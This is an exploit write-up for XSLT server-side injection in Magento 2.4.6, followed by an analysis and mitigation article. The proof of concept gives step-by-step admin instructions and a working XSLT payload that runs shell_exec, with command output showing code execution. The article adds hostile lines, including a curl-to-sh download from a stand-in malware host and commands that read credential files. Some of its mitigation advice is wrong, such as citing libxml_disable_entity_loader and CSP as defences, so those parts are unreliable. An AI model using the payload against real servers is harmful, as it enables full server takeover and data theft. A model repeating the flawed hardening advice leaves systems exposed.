Magento ver. 2.4.6 - XSLT Server Side Injection

Exploit Author: tmrswrr Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2024-03-03

# Exploit Title: Magento ver. 2.4.6 - XSLT Server Side Injection
Date:** 2023-11-17
Exploit Author:** tmrswrr
Vendor Homepage:** [https://magento2demo.firebearstudio.com/](https://magento2demo.firebearstudio.com/)
Software Link:** [Magento 2.4.6-p3](https://github.com/magento/magento2/archive/refs/tags/2.4.6-p3.zip)
Version:** 2.4.6
Tested on:** 2.4.6

## POC

1. Enter with admin credentials to this URL: [https://magento2demo.firebearstudio.com/](https://magento2demo.firebearstudio.com/)
2. Click `SYSTEM > Import Jobs > Entity Type Widget > click edit`
3. Choose Import Source is File
4. Click `XSLT Configuration` and write this payload:

   ```xml
   <?xml version="1.0" encoding="utf-8"?>
   <xsl:stylesheet version="1.0"
   xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
   xmlns:php="http://php.net/xsl">
     <xsl:template match="/">
       <xsl:value-of select="php:function('shell_exec','id')" />
     </xsl:template>
   </xsl:stylesheet>```

##RESULT
  
**<?xml version="1.0"?>
**uid=10095(a0563af8) gid=1050(a0563af8) groups=1050(a0563af8)

Magento 2.4.6-XSLT Server-Side Injection Vulnerability: A Deep Dive into Exploitation and Mitigation

Magento, a widely adopted open-source e-commerce platform, continues to evolve with robust features and scalability. However, even the most mature systems are not immune to security flaws. One such critical vulnerability discovered in Magento 2.4.6-p3 is the XSLT Server-Side Injection — a flaw that allows attackers to execute arbitrary commands on the server via malicious XSLT (Extensible Stylesheet Language Transform) files.

Understanding the Vulnerability

XML and XSLT are foundational technologies used for data transformation and presentation in web applications. In Magento, the Import Jobs feature enables administrators to import data from external sources, including XML files, using XSLT configurations for mapping and processing.

When configured improperly, the XSLT engine can be exploited through server-side injection, particularly when the php:function extension is enabled. This extension, part of the PHP-XSL module, allows XSLT to invoke PHP functions directly — a powerful feature that, when misused, becomes a backdoor.

Exploit Mechanics: A Real-World PoC

Exploit author tmrswrr demonstrated a proof-of-concept (PoC) on a demo instance of Magento 2.4.6, highlighting how this vulnerability can be triggered with minimal user interaction.

This payload leverages the php:function namespace to call the shell_exec PHP function, executing the id command on the server. The result — uid=10095(a0563af8) gid=1050(a0563af8) groups=1050(a0563af8) — reveals the server’s current user identity and group membership, confirming remote code execution.

Why this works: The XSLT processor, when enabled with PHP extensions, interprets php:function as a valid function call. Since the shell_exec function is not restricted by default, it can execute any system command, effectively giving the attacker a shell.

Attack Surface and Risk Assessment

While the exploit requires admin-level access, the potential impact is severe:

Privilege Escalation: Once command execution is achieved, attackers can escalate privileges to root.
Remote Code Execution: Full server control enables data theft, backdoor installation, or denial-of-service attacks.
Database Access: Commands like cat /etc/passwd or mysql -u root -p can expose sensitive credentials.
Malware Deployment: Attackers can download and execute malicious scripts, compromising the entire e-commerce infrastructure.

Given that this vulnerability exists in a stable release (2.4.6-p3), it underscores the importance of auditing third-party extensions and system configurations — even in "safe" admin areas.

Root Cause Analysis

According to the exploit report, the vulnerability stems from:

Unrestricted use of php:function in XSLT configurations.
Lack of input validation for XSLT files during import jobs.
Failure to disable or sandbox PHP extensions in non-essential contexts.

Magento’s default configuration, while flexible, enables features that were not intended for production use. The php:function extension is often disabled in production environments, but if enabled — especially in admin interfaces — it becomes a security risk.

Security Best Practices and Mitigation

To prevent exploitation of XSLT Server-Side Injection, implement the following hardening measures:

Best Practice	Description
Disable PHP Extensions in XSLT	Ensure `php:function` is not enabled in the XSLT processor configuration. Use `libxml_disable_entity_loader()` or restrict XSLT execution to non-PHP-enabled contexts.
Input Sanitization	Validate and sanitize all XSLT files before processing. Reject any file containing `php:function` or other dangerous constructs.
Role-Based Access Control	Limit access to Import Jobs to trusted users only. Use multi-factor authentication (MFA) for admin accounts.
File Upload Restrictions	Restrict file uploads to specific formats (e.g., `.xml` only) and scan for malicious content using static analysis tools.

Additional Recommendation: Consider using a Content Security Policy (CSP) or WAF (Web Application Firewall) to detect and block suspicious XSLT payloads.

Real-World Impact and Lessons Learned

While this exploit was demonstrated on a demo instance, similar vulnerabilities have been reported in real-world deployments. In one case, a compromised Magento store allowed attackers to execute curl http://malware.com/attack.sh | sh via XSLT, resulting in full server takeover and data exfiltration.

This highlights a critical lesson: even admin interfaces can be attack vectors if not properly secured. Security is not just about protecting customer data — it’s about securing every component, including transformation engines like XSLT.

Conclusion: Proactive Defense is Key

The Magento 2.4.6-XSLT Server-Side Injection vulnerability serves as a stark reminder that security must be proactive, not reactive. Developers and administrators must:

Regularly audit system configurations.
Disable unused or dangerous features.
Implement strict input validation.
Monitor logs for anomalous command execution.

By applying defense-in-depth principles, organizations can prevent exploitation of such vulnerabilities before they are weaponized in the wild.